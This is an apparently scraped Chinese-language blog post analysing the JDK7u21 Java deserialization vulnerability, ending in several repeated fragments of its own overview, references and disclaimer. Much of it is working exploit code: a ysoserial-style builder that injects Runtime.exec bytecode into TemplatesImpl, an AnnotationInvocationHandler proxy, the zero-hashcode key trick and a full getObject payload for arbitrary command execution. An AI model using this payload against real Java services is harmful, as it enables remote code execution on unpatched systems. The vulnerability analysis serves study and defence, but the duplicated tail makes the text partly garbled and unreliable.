JDK7u21反序列化漏洞深入分析与利用<\/h1>

漏洞概述<\/h2>
JDK7u21反序列化漏洞是Java核心库中的一个高危漏洞，影响JDK7u21及更早版本。该漏洞允许攻击者通过精心构造的序列化数据在目标系统上执行任意命令，属于反序列化类型的安全漏洞。<\/p>

前置知识<\/h2>

1. Java动态代码生成<\/h3>

漏洞利用中使用了javassist<\/code>工具动态生成恶意字节码：<\/p>

public<\/span> static<\/span> TemplatesImpl createTemplatesImpl<\/span>(<\/span>final<\/span> String command)<\/span> throws<\/span> Exception {<\/span>
<\/span><\/span>    final<\/span> TemplatesImpl templates =<\/span> new<\/span> TemplatesImpl();<\/span>
<\/span><\/span>    ClassPool pool =<\/span> ClassPool.<\/span>getDefault<\/span>();<\/span>
<\/span><\/span>    pool.<\/span>insertClassPath<\/span>(<\/span>new<\/span> ClassClassPath(<\/span>StubTransletPayload.<\/span>class<\/span>));<\/span>
<\/span><\/span>    final<\/span> CtClass clazz =<\/span> pool.<\/span>get<\/span>(<\/span>StubTransletPayload.<\/span>class<\/span>.<\/span>getName<\/span>());<\/span>
<\/span><\/span>    
<\/span><\/span>    \/\/ 在静态初始化块中插入恶意代码
<\/span><\/span><\/span><\/span>    clazz.<\/span>makeClassInitializer<\/span>().<\/span>insertAfter<\/span>(<\/span>"java.lang.Runtime.getRuntime().exec(\""<\/span> +<\/span> 
<\/span><\/span>        command.<\/span>replaceAll<\/span>(<\/span>"\""<\/span>,<\/span> "\\\""<\/span>)<\/span> +<\/span> "\");"<\/span>);<\/span>
<\/span><\/span>    
<\/span><\/span>    clazz.<\/span>setName<\/span>(<\/span>"ysoserial.Pwner"<\/span> +<\/span> System.<\/span>nanoTime<\/span>());<\/span>
<\/span><\/span>    final<\/span> byte<\/span>[]<\/span> classBytes =<\/span> clazz.<\/span>toBytecode<\/span>();<\/span>
<\/span><\/span>    
<\/span><\/span>    \/\/ 注入恶意字节码到TemplatesImpl实例
<\/span><\/span><\/span><\/span>    Reflections.<\/span>setFieldValue<\/span>(<\/span>templates,<\/span> "_bytecodes"<\/span>,<\/span> new<\/span> byte<\/span>[][]{<\/span>classBytes,<\/span> ClassFiles.<\/span>classAsBytes<\/span>(<\/span>Foo.<\/span>class<\/span>)});<\/span>
<\/span><\/span>    Reflections.<\/span>setFieldValue<\/span>(<\/span>templates,<\/span> "_name"<\/span>,<\/span> "Pwnr"<\/span>);<\/span>
<\/span><\/span>    Reflections.<\/span>setFieldValue<\/span>(<\/span>templates,<\/span> "_tfactory"<\/span>,<\/span> new<\/span> TransformerFactoryImpl());<\/span>
<\/span><\/span>    
<\/span><\/span>    return<\/span> templates;<\/span>
<\/span><\/span>}<\/span>
<\/span><\/span><\/code><\/pre>关键点：<\/p>

使用TemplatesImpl<\/code>类作为恶意代码载体<\/li>
通过javassist<\/code>动态修改类字节码<\/li>
在静态初始化块中插入命令执行代码<\/li>
通过反射设置_bytecodes<\/code>等关键字段<\/li>
<\/ul>
2. Java动态代理机制<\/h3>
漏洞利用中使用了动态代理来拦截方法调用：<\/p>
\/\/ 创建代理使用的handler
<\/span><\/span><\/span><\/span>Constructor<?><\/span> ctor =<\/span> Class.<\/span>forName<\/span>(<\/span>"sun.reflect.annotation.AnnotationInvocationHandler"<\/span>)<\/span>
<\/span><\/span>    .<\/span>getDeclaredConstructors<\/span>()[<\/span>0<\/span>];<\/span>
<\/span><\/span>ctor.<\/span>setAccessible<\/span>(<\/span>true<\/span>);<\/span>
<\/span><\/span>InvocationHandler tempHandler =<\/span> (<\/span>InvocationHandler)<\/span>ctor.<\/span>newInstance<\/span>(<\/span>Templates.<\/span>class<\/span>,<\/span> map);<\/span>
<\/span><\/span>
<\/span><\/span>\/\/ 创建代理对象
<\/span><\/span><\/span><\/span>Templates proxy =<\/span> (<\/span>Templates)<\/span>Proxy.<\/span>newProxyInstance<\/span>(<\/span>
<\/span><\/span>    JDK7u21.<\/span>class<\/span>.<\/span>getClassLoader<\/span>(),<\/span> 
<\/span><\/span>    templates.<\/span>getClass<\/span>().<\/span>getInterfaces<\/span>(),<\/span> 
<\/span><\/span>    tempHandler);<\/span>
<\/span><\/span><\/code><\/pre>关键点：<\/p>

使用AnnotationInvocationHandler<\/code>作为调用处理器<\/li>
代理Templates<\/code>接口的所有方法<\/li>
方法调用会被路由到invoke<\/code>方法<\/li>
<\/ul>
漏洞利用链分析<\/h2>
完整的利用链如下：<\/p>
LinkedHashSet.readObject()
  HashSet.readObject()
    HashMap.put()
      templates.equals()
        AnnotationInvocationHandler.invoke()
          AnnotationInvocationHandler.equalsImpl()
            Method.invoke()
              TemplatesImpl.getOutputProperties()
                (恶意字节码执行)
<\/code><\/pre>
详细触发流程<\/h3>

反序列化入口<\/strong>：LinkedHashSet.readObject()<\/code>开始反序列化过程<\/li>
HashSet处理<\/strong>：调用父类HashSet.readObject()<\/code>方法<\/li>
HashMap操作<\/strong>：将元素放入HashMap时触发put()<\/code>操作<\/li>
Hash比较<\/strong>：在put()<\/code>方法中会进行hash比较和equals比较<\/li>
代理拦截<\/strong>：equals比较被动态代理拦截，转到AnnotationInvocationHandler.invoke()<\/code><\/li>
方法调用<\/strong>：equalsImpl()<\/code>方法会反射调用目标对象的所有方法<\/li>
触发执行<\/strong>：当调用到TemplatesImpl.getOutputProperties()<\/code>时触发恶意字节码执行<\/li>
<\/ol>
关键绕过技术<\/h2>
1. HashCode绕过<\/h3>
漏洞利用需要满足以下条件才能触发equals调用：<\/p>
e.<\/span>hash<\/span> ==<\/span> hash &&<\/span> ((<\/span>k =<\/span> e.<\/span>key<\/span>)<\/span> ==<\/span> key ||<\/span> key.<\/span>equals<\/span>(<\/span>k))<\/span>
<\/span><\/span><\/code><\/pre>解决方案：<\/p>

使用hashCode为0的特殊字符串"f5a5a608"作为key<\/li>
精心构造AnnotationInvocationHandler<\/code>使得proxy.hashCode() == templates.hashCode()<\/code><\/li>
<\/ol>
String zeroHashCodeStr =<\/span> "f5a5a608"<\/span>;<\/span>
<\/span><\/span>HashMap map =<\/span> new<\/span> HashMap();<\/span>
<\/span><\/span>map.<\/span>put<\/span>(<\/span>zeroHashCodeStr,<\/span> "foo"<\/span>);<\/span>
<\/span><\/span><\/code><\/pre>2. 动态代理机制利用<\/h3>
通过动态代理将方法调用重定向：<\/p>
public<\/span> Object invoke<\/span>(<\/span>Object proxy,<\/span> Method method,<\/span> Object[]<\/span> args)<\/span> throws<\/span> Throwable {<\/span>
<\/span><\/span>    if<\/span> (<\/span>method.<\/span>getName<\/span>().<\/span>equals<\/span>(<\/span>"equals"<\/span>))<\/span> {<\/span>
<\/span><\/span>        return<\/span> this<\/span>.<\/span>equalsImpl<\/span>(<\/span>proxy,<\/span> args[<\/span>0<\/span>]);<\/span>
<\/span><\/span>    }<\/span>
<\/span><\/span>    \/\/ 其他方法处理...
<\/span><\/span><\/span><\/span>}<\/span>
<\/span><\/span><\/code><\/pre>equalsImpl<\/code>方法会反射调用目标对象的所有方法，从而触发getOutputProperties()<\/code>的执行。<\/p>
完整PoC分析<\/h2>
public<\/span> Object getObject<\/span>(<\/span>final<\/span> String command)<\/span> throws<\/span> Exception {<\/span>
<\/span><\/span>    \/\/ 1. 生成包含恶意字节码的TemplatesImpl对象
<\/span><\/span><\/span><\/span>    Object templates =<\/span> Gadgets.<\/span>createTemplatesImpl<\/span>(<\/span>command);<\/span>
<\/span><\/span>    
<\/span><\/span>    \/\/ 2. 准备特殊hashCode的key
<\/span><\/span><\/span><\/span>    String zeroHashCodeStr =<\/span> "f5a5a608"<\/span>;<\/span>
<\/span><\/span>    
<\/span><\/span>    \/\/ 3. 创建HashMap并放入特殊key
<\/span><\/span><\/span><\/span>    HashMap map =<\/span> new<\/span> HashMap();<\/span>
<\/span><\/span>    map.<\/span>put<\/span>(<\/span>zeroHashCodeStr,<\/span> "foo"<\/span>);<\/span>
<\/span><\/span>    
<\/span><\/span>    \/\/ 4. 创建动态代理handler
<\/span><\/span><\/span><\/span>    Constructor<?><\/span> ctor =<\/span> Class.<\/span>forName<\/span>(<\/span>"sun.reflect.annotation.AnnotationInvocationHandler"<\/span>)<\/span>
<\/span><\/span>        .<\/span>getDeclaredConstructors<\/span>()[<\/span>0<\/span>];<\/span>
<\/span><\/span>    ctor.<\/span>setAccessible<\/span>(<\/span>true<\/span>);<\/span>
<\/span><\/span>    InvocationHandler tempHandler =<\/span> (<\/span>InvocationHandler)<\/span>ctor.<\/span>newInstance<\/span>(<\/span>Templates.<\/span>class<\/span>,<\/span> map);<\/span>
<\/span><\/span>    
<\/span><\/span>    \/\/ 5. 创建代理对象
<\/span><\/span><\/span><\/span>    Templates proxy =<\/span> (<\/span>Templates)<\/span>Proxy.<\/span>newProxyInstance<\/span>(<\/span>
<\/span><\/span>        JDK7u21.<\/span>class<\/span>.<\/span>getClassLoader<\/span>(),<\/span> 
<\/span><\/span>        templates.<\/span>getClass<\/span>().<\/span>getInterfaces<\/span>(),<\/span> 
<\/span><\/span>        tempHandler);<\/span>
<\/span><\/span>    
<\/span><\/span>    \/\/ 6. 清理一些字段避免干扰
<\/span><\/span><\/span><\/span>    Reflections.<\/span>setFieldValue<\/span>(<\/span>templates,<\/span> "_auxClasses"<\/span>,<\/span> null<\/span>);<\/span>
<\/span><\/span>    Reflections.<\/span>setFieldValue<\/span>(<\/span>templates,<\/span> "_class"<\/span>,<\/span> null<\/span>);<\/span>
<\/span><\/span>    
<\/span><\/span>    \/\/ 7. 构造最终payload集合
<\/span><\/span><\/span><\/span>    LinkedHashSet set =<\/span> new<\/span> LinkedHashSet();<\/span>
<\/span><\/span>    set.<\/span>add<\/span>(<\/span>templates);<\/span>  \/\/ 包含恶意字节码的对象
<\/span><\/span><\/span><\/span>    set.<\/span>add<\/span>(<\/span>proxy);<\/span>      \/\/ 代理对象
<\/span><\/span><\/span><\/span>    
<\/span><\/span>    \/\/ 8. 关键步骤：修改map中的value为templates对象
<\/span><\/span><\/span><\/span>    map.<\/span>put<\/span>(<\/span>zeroHashCodeStr,<\/span> templates);<\/span>
<\/span><\/span>    
<\/span><\/span>    return<\/span> set;<\/span>
<\/span><\/span>}<\/span>
<\/span><\/span><\/code><\/pre>漏洞修复方案<\/h2>
后续Java版本中修复了此漏洞，主要措施包括：<\/p>

修改AnnotationInvocationHandler<\/code>的实现，防止被滥用<\/li>
加强序列化过程的安全检查<\/li>
对关键类的字段访问进行限制<\/li>
<\/ol>
学习总结<\/h2>

深入理解Java序列化机制<\/strong>：掌握反序列化过程中的关键方法调用链<\/li>
动态代理的应用<\/strong>：了解动态代理在漏洞利用中的关键作用<\/li>
反射的高级用法<\/strong>：学习如何通过反射修改关键字段值<\/li>
hashCode机制的绕过<\/strong>：理解如何构造特殊的hashCode条件<\/li>
Java安全模型<\/strong>：认识Java安全机制的局限性和绕过方法<\/li>
<\/ol>
参考资源<\/h2>

原始漏洞分析文章<\/a><\/li>
ysoserial项目源码<\/a><\/li>
Java反序列化漏洞详解<\/a><\/li>
<\/ol>
注：本文仅用于技术研究与学习，请勿用于非法用途。<\/em><\/p>

JDK7u21反序列化漏洞深入分析与利用<\/h1>

漏洞概述<\/h2> JDK7u21反序列化漏洞是Java核心库中的一个高危漏洞，影响JDK7u21及更早版本。该漏洞允许攻击者通过精心构造的序列化数据在目标系统上执行任意命令，属于反序列化类型的安全漏洞。<\/p>

前置知识<\/h2>

关键绕过技术<\/h2>

参考资源<\/h2> 原始漏洞分析文章<\/a><\/li> ysoserial项目源码<\/a><\/li> Java反序列化漏洞详解<\/a><\/li> <\/ol> 注：本文仅用于技术研究与学习，请勿用于非法用途。<\/em><\/p>

漏洞概述<\/h2>
JDK7u21反序列化漏洞是Java核心库中的一个高危漏洞，影响JDK7u21及更早版本。该漏洞允许攻击者通过精心构造的序列化数据在目标系统上执行任意命令，属于反序列化类型的安全漏洞。<\/p>

参考资源<\/h2>

原始漏洞分析文章<\/a><\/li>
ysoserial项目源码<\/a><\/li>
Java反序列化漏洞详解<\/a><\/li> <\/ol>
注：本文仅用于技术研究与学习，请勿用于非法用途。<\/em><\/p>